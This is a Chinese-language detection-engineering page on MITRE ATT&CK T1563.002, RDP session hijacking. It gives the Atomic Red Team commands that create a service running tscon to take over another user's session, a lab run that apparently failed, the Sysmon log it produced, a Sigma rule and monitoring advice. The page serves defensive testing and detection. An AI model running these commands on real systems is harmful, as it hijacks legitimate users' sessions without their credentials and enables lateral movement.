跳转至

T1563-002-win-远程服务会话劫持-RDP劫持

来自ATT&CK的描述

攻击者可能会劫持合法用户的远程桌面会话用以在内网环境中横向移动。远程桌面是操作系统中的常见功能。它允许用户使用远程系统上的系统桌面图形用户界面登录到交互式会话。Microsoft 将其远程桌面协议 (RDP) 的实现称为远程桌面服务 (RDS)。

攻击者可能会进行RDP会话劫持,包括窃取合法用户的远程会话。通常情况下,当别人试图窃取他们的会话时,用户会得到通知。通过系统权限和使用终端服务控制台,c:\windows\system32\tscon.exe[要窃取的会话号码],攻击者可以劫持一个会话,而不需要凭证或提示用户。这可以在远程或本地进行,也可以在活动或断开的会话中进行。

它还可以通过窃取域管理员或更高权限的帐户会话来导致远程系统发现和权限提升。所有这些都可以通过使用本机Windows命令来完成,但它也已作为红队工具中的一项能力。

测试案例

测试1 RDP hijacking

RDP劫持--如何透明地劫持RDS和RemoteApp会话,以便在内网中移动。 测试命令。用命令提示符运行, 需要提升等级(如root或admin)。 

query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
net start sesshijack
Session_ID:1337 Destination_ID:rdp-tcp#55 清除命令: 
sc.exe delete sesshijack >nul 2>&1

检测日志

windows 安全日志、Windows sysmon日志

测试复现

测试1 RDP hijacking

C:\Users\Administrator.ZHULI>query user
 用户名                会话名             ID  状态    空闲时间   登录时间
>administrator         console             1  运行中      无     2022/1/13 16:10

C:\Users\Administrator.ZHULI>sc.exe create sesshijack binpath= "cmd.exe /k tscon 1 /dest:1"
[SC] CreateService 成功

C:\Users\Administrator.ZHULI>net start sesshijack
服务没有响应控制功能。

请键入 NET HELPMSG 2186 以获得更多的帮助。
由于测试样机,无RDP登陆会话,故测试未成功复现。

测试留痕

测试1 RDP hijacking

Process Create:

RuleName: technique_id=T1059,technique_name=Command-Line Interface

UtcTime: 2022-01-13 08:17:07.755

ProcessGuid: {78c84c47-e003-61df-3f01-000000000900}

ProcessId: 2640

Image: C:\Windows\System32\sc.exe

FileVersion: 10.0.17763.1 (WinBuild.160101.0800)

Description: Service Control Manager Configuration Tool

Product: Microsoft® Operating System

Company: Microsoft Corporation

OriginalFileName: sc.exe

CommandLine: sc.exe create sesshijack binpath= "cmd.exe /k tscon 1 /dest:1"

CurrentDirectory: C:\Users\Administrator.ZHULI\

User: ZHULI\Administrator

LogonGuid: {78c84c47-de8c-61df-d399-0a0000000000}

LogonId: 0xA99D3

TerminalSessionId: 1

IntegrityLevel: High

Hashes: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF

ParentProcessGuid: {78c84c47-dec6-61df-0601-000000000900}

ParentProcessId: 5196

ParentImage: C:\Windows\System32\cmd.exe

ParentCommandLine: "C:\Windows\system32\cmd.exe" 

ParentUser: ZHULI\Administrator

检测规则/思路

Sigma规则

title: Windows远程服务会话劫持
description: 攻击者可能会劫持合法用户的远程桌面会话用以在内网环境中横向移动。
author: 12306Br0
date: 2022/01/13
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md
tags:
    - attack.t1037-001
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID: 1
        CommandLine: 
                 - 'cmd.exe /k'
                 - 'cmd.exe /c'
    condition: selection
level: high

建议

考虑监控tscon.exe的使用进程,监控参数中使用cmd.exe /k或 cmd.exe /c的服务创建,用于检测RDP会话劫持。

RDP的使用可能是合法的,这取决于网络环境和它的使用方式。其他因素,如访问模式和远程登录后发生的活动,可能表明RDP的可疑或恶意行为。

参考推荐

MITRE-ATT&CK-T1563-002

https://attack.mitre.org/techniques/T1563/002/

Atomic-red-team-T1563.002

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md